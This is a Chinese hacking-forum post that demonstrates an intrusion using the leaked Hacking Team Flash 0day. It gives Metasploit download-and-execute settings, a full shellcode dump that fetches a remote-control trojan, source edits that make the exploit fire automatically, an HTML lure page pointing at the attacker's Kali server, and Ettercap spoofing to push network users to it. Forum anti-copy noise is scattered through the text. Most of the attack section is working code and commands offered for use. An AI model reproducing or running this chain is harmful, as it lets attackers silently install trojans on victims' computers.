找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1567|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, E& c" |6 s: a j5 i3 k4 | 三、flash 0day之手工代码修改制作下载者实例入侵演示 + i$ k+ }+ U6 @6 d1 l

4 N2 m% h1 G8 F0 o

2 v: A1 G, f# O2 i. _% k2 T6 M 利用到的工具: & v" b- Y4 E- }+ M3 f

! p: k% t/ D9 |- l3 D

7 w, Z2 A7 \7 u, q4 u v. B% ~. N Msf , W& i' ]2 l& p

% z1 m' v# ?. X0 F8 H$ p$ F

* Y c5 e0 h; d4 u9 C0 D+ n Ettercap & A; V4 L% ` i P# O$ b e

- k* S3 t- ?( g- n" A- Z! n

5 U' J& _0 E) u# {& T' K5 P Adobe Flash CS6 8 E. s' q7 O: V8 ]$ u" L8 r

; R: F R1 E! I: j& s: H6 ^

6 y. V7 ?/ ?3 l& o0 M Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) n& b5 F4 ^$ `6 H. l9 b% [

0 |8 a; G& A2 ^4 ^$ k; i0 {. X" F

7 p# P5 ?, i! V0 X- l 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 5 q7 Y3 y! Y2 J& Z' h; ?9 j

1 t! H" v, V: V; G# w7 u" e

! b* ?; i/ v. a3 U T! h 如图: ) p5 X5 _4 ~5 `, m9 ?% ~; G) f. a

8 a* g& H3 B* }/ W( P/ R

6 |5 r/ p. H, J3 N- J   ( w1 z9 q w. T5 n* }9 P/ z1 C

) W O e$ G/ P% q" G, u

$ g* ^2 a% q! U8 k   e9 `2 V* r1 g; j) k& i# u# I* f7 z

5 d) s6 a5 y7 T& N3 r

# O% @7 p0 K# N& D. } 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 1 s8 k. S# C# y' f+ f

8 |( s; J5 o6 X* O6 R7 O; V2 t

; b! [) q6 ?6 ~   1 U3 s; K0 B4 `6 c$ P

$ H( \2 ~. ?& n5 p* X5 ] ~

4 N0 x9 @( T+ Y! x4 {* g   - h3 {9 G' Z+ z6 \# |

1 \( ]3 @9 L/ V8 }! k- ^8 q5 z

* x9 J1 g% L8 S/ ~, d, | 然后执行generate -t dword生成shellcode,如下: 1 `" h' Q7 `5 R) W q

# D+ r; M' ^: n( _. \( p

7 e& w V6 T+ h# r& ?5 x   f4 ?( j b' I, k# m$ J( u

" S9 A; p: ]% ]4 n

% h. c/ M: ?9 v1 m! H 复制代码到文本下便于我们一会编辑flash exp,如下: U q, b5 j( B; S7 S

4 V& {( V+ d9 a3 c* `

5 |0 M" Q( x& F& s8 ^ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ! q; O7 H/ M/ n# y: D

: w- n+ F- y+ D: c8 g8 H7 ~8 n

2 @/ V u( ^% J2 m2 ^3 \ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 5 u' `7 x& i1 ^0 x6 {# ?

# k( ?8 O2 R. k6 F) t3 V- M7 s

- G) U; ?0 t2 V 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, * m q# r- x$ e# R

5 ]+ [! M# I( D: S, G$ ]- M

7 ?3 @( [ ^9 `' K$ T. n( O2 q 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, & f+ F) r: f" A+ R+ K( \% P& B- {

' P J/ u. J6 W0 ]2 m" e |

; ~" P% E7 u# r2 X% z- w 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 9 P& s. ]. T3 ^3 g1 N+ k: Q

8 s+ l/ @+ h8 E3 f) j% ~

- O9 s) A+ J! u! k+ G 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ! L6 m; V( g+ b% |+ w3 O

. |8 g6 \$ S& Z9 S& ^7 F

( k1 E5 L) \$ h0 b7 ]9 R1 X' a 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, * { u8 N" |2 F( E+ k ~5 m2 n

8 q; D! p' r0 s: |0 M

. x, V' ]) l8 {# Q0 ^ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 7 ]2 v8 }+ z6 y: Z! I8 @

& R, U7 \( d3 D; X1 u, _ ?

o" ^$ p0 d, I1 g1 G. B$ r 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( q8 v+ O' K8 Q% c% C

* X" V# S6 j1 [' k

, S" p3 c3 U" U5 U* K 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' u7 U5 L4 R h

* L( ~! Z2 F5 x- L& p

. Y# j1 t9 r+ o6 \ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, & d. B+ W. H$ C8 h

2 D5 m. P3 k( Z/ Q! I

% A/ p3 B1 h o8 O+ U1 N 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, u! k- [; q, O

% S9 ~% t! }- T7 v$ L4 u% x5 o

5 E! W, h+ M1 U* }1 {' I2 }) l+ R 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 5 I7 l. J* c2 V5 K3 d2 J; O

+ n4 z9 m0 ^1 x

; L# E) x. L( p' s# B4 f 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 - g1 m+ t v+ A h b4 T

0 y8 }5 x2 _: O& P, ~

: U2 w& d N! {. \   0 R: W5 f! d; }6 P: i* i4 f# ^

$ k! u5 z* h) P" s

. G2 d0 P; k* F, q: w) a; t6 i   7 `1 O% [8 ^: R: q9 @6 N3 C

; s+ x! g$ G Y' U8 F: h

& N; O6 J9 R1 z! L. s& p) v 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 0 c6 g! z' t- H _: F1 V

4 ~ G" j2 D/ ?, D( Z- b5 N/ E0 _

& H# }0 F/ G1 O1 y, M- K: J# ?, }   4 m( V6 `/ V& n9 J' N# {$ u/ I

/ C' b6 J5 ]" T0 R

- _# J7 [- s( S# z' [' e2 U( Z 先修改ShellWin32.as,部分源代码如图: 2 x+ e. o' C! g: f

& z( G) R* Y v8 Z. E& p/ Y

, X5 L+ M# q9 Z9 Z   ! [0 c. Z. C, Z' B! z( C( p! M& N

8 W' i4 E r' p& U+ e

7 }4 |3 Z+ m8 s8 d4 _( W/ ~ 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: & v+ p, O; @8 g; C/ {# C8 o* d$ L

( K/ ~" S! w7 ?" Z) z

- q+ o6 i+ l5 \4 I   & M, j; j( C# ^2 D' |! p

3 E: R% d# v* {! z# r0 a7 B

( P# v4 W! p/ r: J 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 8 ]! k/ @% H3 _$ e: ^% `

* l' W* Z$ k. ?' B* J3 W

4 j3 G1 a e) ^   * V; X# r: Y; t9 x! y

. c; X8 \; G& v8 R5 l( ~

% G# n* R% G8 y' Z 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: : L2 A W9 q+ \- S

$ W" U7 X, g/ G% o8 ~% c: j( `

4 ?) X2 \9 C3 Z5 w2 e   ; f; e: h$ r8 Q5 v6 A

: J! U1 K0 q6 l

' i7 O5 E0 \$ ]$ p/ f! F7 T% U! l   W( N5 @+ H% e6 P$ x) g

# _; F4 ~2 ` n/ O- \7 W$ H6 R: q s: o

; e0 P" \5 B l" B1 S2 v0 N( J( q" ?   : f! Q7 A. C5 W1 ~; a O( W

* ~ ~) j6 l0 H$ F

0 x6 }1 I1 c( q! P 然后点保存,下面我们来编译一下,打开 3 @$ C( u# i3 K0 g' ?0 O: c, c

2 W8 z8 G. W1 Q5 M

2 ~4 U7 l6 N: m0 _* }4 y" w O exp1.fla然后点文件-发布,看看编译没错误 6 X7 Q) u' {+ w4 u1 g% b( N

5 h2 c, w, _ q; ~% ]+ W) u

1 g; \1 y& e- P' Z% [   % k: z6 O" B ^2 T

" g6 y p- O3 {6 c6 g* Y. u6 B

1 }2 W0 E$ L: ^, I7 p+ b% {* @, Z   * a2 Z% n+ }3 x0 u& a: a

3 u7 p; y: {% Y; A# J

1 q) K* e d: K" t8 S3 p+ a5 A   8 M! K. i' F, ]% P

8 @( f5 Q1 \; ?

6 V1 c6 h" |5 v" d& [& Q7 U1 I: T   $ {1 L$ f$ ~) A( D

( I4 \ E r" F. Z8 G' N1 ~

3 N4 K% A! g4 D. X% F$ R: v 然后我们把生成的 $ b0 U; M- {8 u7 ~& N6 ~# |& X

2 V# h. m5 k4 C1 s+ t, \9 j

6 t& E) d. [6 i% k exp1.swf丢到kailinux /var/www/html下: / E$ O. \. a" a' u! X

: j$ U0 C7 t$ e( P9 R2 Q; w

, _/ i& V4 h. X: }# F f 然后把这段代码好好编辑一下 6 r+ c4 N) ?3 Z2 Z% h9 P7 O4 F

4 Z0 Q* `7 ~1 \# [$ Q- K

. N$ ]) N# u* t/ z# e   2 \/ t0 o: \4 L0 B7 s

; F1 v' }: U4 d& T8 L

, a% c* m1 N2 S   6 e% K8 X( h( R0 N( H

+ n ?# d4 q" ?* G7 E

. O" X. J" V4 Y# q   $ ?- F& f% p* m9 b

' X8 ], l9 y- [5 J

2 U ^7 n/ r: |- T   3 z- ~; X* T1 T; P: s; m

; V R) M) W1 W9 f& D% b5 A

+ u! Q) g; j% {( p   & s- \- ^! C; Z. k# o' {6 ~0 G

6 Q5 l( ~; e7 y

6 o1 Z: m" b0 q( [4 k& Q# v2 t/ B% }   - T" J) n0 o- t6 }! K+ Z

3 d2 K3 N- C( [

5 f2 I! M9 l, E' \ <!DOCTYPE html> 2 W$ A% R6 K% L: d4 g7 z; e; j$ s

; [. F& z& G; N! T0 o, ^' H

" e# p: m$ h( c% B0 H4 Z <html> 0 w7 s X0 u+ y+ Y {, g

; B! p$ j9 q, K+ V7 F% {/ q( ~

+ H9 x6 s* \9 e0 ?" @ <head> / j M. g' P% t# j/ v

- l3 F: E1 w/ ` L5 I9 i

; I. n' l# e& O- P6 x$ e <meta http-equiv="Content-Type" content="text/html; 7 L4 ^6 u5 K) A8 ^

; V$ v* ~0 `* R* ^ u* _% Y8 D

6 x- \6 n/ a6 S A1 W2 }5 e charset=utf-8"/> 8 J+ @- V9 a) N3 Q* j

( ^: Q0 E) ^0 Y0 \/ e

; n1 ~0 O" H( x; U* v4 | </head> 8 H- k& D9 f& C, n; E% c9 \% x6 k! ~

0 T; n% V8 H1 K( y$ k

7 m- q1 L8 T3 ?7 ?) y <body> , s, V" t' a1 @/ D9 A6 x

# c/ G4 w* X) [7 {* v$ o

r, Z$ R" r8 R% f( u <h2> Please wait, the requested page is loading...</h2> ; e V( }; J$ ~! c& F$ D' {

; ?3 X4 O7 c1 b. L! x5 Z+ O

& ~7 r, t& @ ~7 m5 A3 S <br> ! K1 W% K' |5 T$ {5 f# `- K+ G( w

. Y3 h& @) _: }6 Z# W, K' J

9 [( F2 W% ~, \( q8 c <OBJECT ) X4 r1 N. R) @6 b' m( P! `

7 x& l2 n' h% @5 F3 h* D- j

: n2 @- E; E! r- R7 W% @. J/ { classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 3 R2 b. q4 \* b

1 k+ h8 K T3 N

- Q# K- T# d( T1 J0 g" {4 c% a5 X VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( }* \6 a5 s; E# q/ T

' l1 ~8 w/ ]" \4 `5 Q$ X! v

- t4 x+ J' L% i1 E" g/ h </body> 4 f5 E- G9 N4 P. G U$ e

' Q6 B* E! y1 a$ _7 \- X

, t0 o, l0 r6 M. ?! z8 F$ P; Z6 X( t. S <script> / x5 Q2 ~( `2 R+ u- T5 ~) Q

+ q9 U/ h" u' ~- ^

' H) ?& G4 w; b5 O8 L, v( H     setTimeout(function () { , z z5 ~6 J3 i1 Q8 ?1 T2 ~ t! ?

- t8 d/ O+ q1 u% u3 k

1 Z8 N9 ]' E) S- Z2 _          ( r4 j1 K4 A0 [" y2 N

6 P- N$ Z. I5 a6 U2 ~ D6 N

% Z$ e- \. k. G" G5 Q window.location.reload(); ; [9 D( \9 F' y2 ?2 p% f+ @

' Q& b' H9 E' P% p" H8 Z

3 k8 _5 N F; O     }, 10000); % G4 _9 ?2 t) Y1 e9 ~ N

0 I6 p, [0 i( l4 g/ M) a

% K* k: ]: r( W8 L( k1 [   . O( x! L4 @6 x: U

: y, B" [# D# V

! T: B( Y( g& R- T) u- u </script> 8 k5 ^: J4 @* v- _3 ?1 n* q& U

% F3 k% D, G9 W+ z2 a6 ^

* Q4 f7 G$ Z R$ l5 D5 Z3 M0 O </html> , j% _& {5 t; `7 \: e3 X( A

1 z' t: n! l* s0 A: L

( y; K7 ?8 a7 M   . B% X& g. j9 j. k

4 p* M1 x/ R Y- E: b- `: F8 y K

3 w4 v/ h+ x4 t8 ]. E1 y 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: . ?4 x1 X4 x: H4 r

0 L; T* T' a( G; R

; j* Q9 B' Q" ^1 g" Q" X   - a# V: }1 d- G2 Z' _% }# {3 K

# D* [9 u; e$ h, C

8 w, K) Y6 E- @ U   & r3 z. _1 x' Q: J: e

4 D+ s* ?2 e% F% y

' m8 Y7 i: l+ s   ' f1 L7 `' }! \

( p9 ^* f7 i% }+ O" r* F

* e9 J3 Y4 p* @6 X, H) `4 [0 ]   3 _) _' K. N* M2 r9 d6 }7 F ^, _

8 t. G J" l9 n5 [

" g( I, h; q" A# t: W5 V   % T8 R) y7 J( f) r

2 _. o' J* L- ?1 i

* k* }6 N* B! S4 D" U# n, I( A# F2 O8 c 下面我们用ettercap欺骗如图: # v: C0 Q% d. a+ G+ E4 s

! v4 g O$ j4 ?9 B6 V* [6 F9 U0 r

$ `5 @! e; F+ H/ Q/ W3 m   ' {' o. v! X ~( @, c# a

; U6 O" |- _; d( C5 `4 D

+ H" f* `4 k0 e* i1 I& r4 L& A( @   + w. V5 S2 }& v" o

8 W# x6 R: h/ G# v% a" B4 d

x( c( v: ]2 u' j, I" \. ~ 下面我们随便访问个网站看看: 2 E* M [/ T3 y6 b$ A8 u

( t# {$ m+ w4 B' W; p R

' n K+ G& t3 o7 X 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: . A" u3 R4 |& _ k* x2 {" `. ?

) R5 A& S9 q" N/ J9 s* Y- @4 {* i

/ `, M4 h0 v) z$ ?( C0 I   7 D( v4 c9 _7 D( |6 g

: e$ g' C' I% }* ^6 R

1 q- {$ I2 M5 C" h( g" K( \1 S 我们看另一台, ( b A# h8 ^5 h6 P

/ c3 k2 B$ c% M2 ~0 N; J. {

) b: J6 H, H" @$ Q6 w$ Q$ { 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 . G/ Q! r$ d) D0 b% B1 \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表